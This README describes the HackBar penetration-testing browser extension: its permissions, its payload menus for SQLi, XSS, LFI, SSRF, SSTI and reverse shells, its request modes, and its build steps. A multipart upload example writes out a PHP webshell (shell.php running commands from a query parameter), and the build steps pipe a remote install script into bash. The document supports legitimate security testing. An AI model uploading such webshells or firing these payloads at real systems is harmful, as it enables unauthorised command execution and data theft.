A browser extension for Penetration Testing.
Available on Chrome Web Store and Firefox Add-ons.
-
storage
- Save theme preferences
-
scripting
- Perform POST request
- Run test function
-
webRequest
- Remember request information
- Listen finish event to clean up
-
declarativeNetRequest
- Set HTTP header value based on settings
-
Load
- From tab (default)
- From cURL command
-
Supported
- HTTP methods
- GET
- POST
- application/x-www-form-urlencoded
- multipart/form-data
- application/json
- Request editing mode
- Basic
- Raw
- Custom payload
- HTTP methods
-
Auto Test
- Common paths (Wordlist from dirsearch included)
-
SQLi
- Dump all database names (MySQL, PostgreSQL, MSSQL)
- Dump tables from database (MySQL, PostgreSQL, SQLite, MSSQL)
- Dump columns from database (MySQL, PostgreSQL, SQLite, MSSQL)
- Union select statement (MySQL, PostgreSQL, SQLite, MSSQL)
- Error-based injection statement (MySQL, PostgreSQL, MSSQL)
- Dump in one shot payload (MySQL)
- Dump current query payload (MySQL)
- Space to Inline comment
-
XSS
- Vue.js XSS payloads
- Angular.js XSS payloads for strict CSP
- Some snippets for CTF
- Html encode/decode with hex/dec/entity name
- String.fromCharCode encode/decode
- Helper function for converting payload with
atob
-
LFI
- PHP wrapper - Base64
-
SSRF
- AWS - IAM role name
-
SSTI
- Jinja2 SSTI
- Java SSTI
-
Shell
- Python reverse shell cheatsheet
- sh(bash) reverse shell cheatsheet
- nc(ncat) reverse shell cheatsheet
- PHP webshell/reverse shell cheatsheet
-
Encoding
- URL encode/decode
- Base64 encode/decode
- Hexadecimal encode/decode
- Unicode encode/decode
- Escape ASCII with hex/oct
-
Hashing
- MD5
- SHA1
- SHA256
- SHA384
- SHA512
- Open Developer tools (Press
F12orCtrl + Shift + I) - Switch to HackBar tab
- Enjoy it
| Description | Shortcut |
|---|---|
| Load | Alt + A |
| Split | Alt + S |
| Execute | Alt + X |
| Mode | Alt + M |
After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"
user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php
<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--
We will consider the first line as boundary, and reconstruct a form element to send your request.
Therefore, sent boundary will not be the same as you typed.
After changing enctype field to application/json, you can put your payload into Body field such as the following:
{
"username": "admin",
"password": "admin"
}If your payload doesn't contain =:
In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:
{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }For more details, please visit "Posting JSON with an HTML Form".
This mode is implemented via fetch API. It will try the best to send a request as same as you typed.
However, there are some limitations:
Request
- It is unable to use a specified HTTP protocol version.
The protocol version is fixed to
HTTP/1.1in the editor, but what version used in a request is up tofetchbehavior. - Some HTTP headers may appear in a sent request even if you don't add them in the editor.
e.g.Connection,Cache-Control,Pragma, etc.These headers will be assigned a default value. For example,
Connection: keep-alive,Cache-Control: no-cache.
Response
- [Chrome] It always shows
HTTP/1.1if used protocol version is higher than or equal to HTTP/2.See also Chromium Code Search
See package.json for details.
Assume that we are in a clean ubuntu:22.04 container
# Update apt
apt update
# Install basic tools
apt install -y curl python3 make gcc g++ patch jq
# Install nvm
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
# Restart shell
exec "$SHELL"
# Install Node.js 22
nvm install 22
# Install yarn
npm install -g yarn
# Go to the source code directory
cd hackbar
# Install hackbar dependencies
yarn install
# Build hackbar for Firefox and Chrome
yarn build:firefox
yarn build:chrome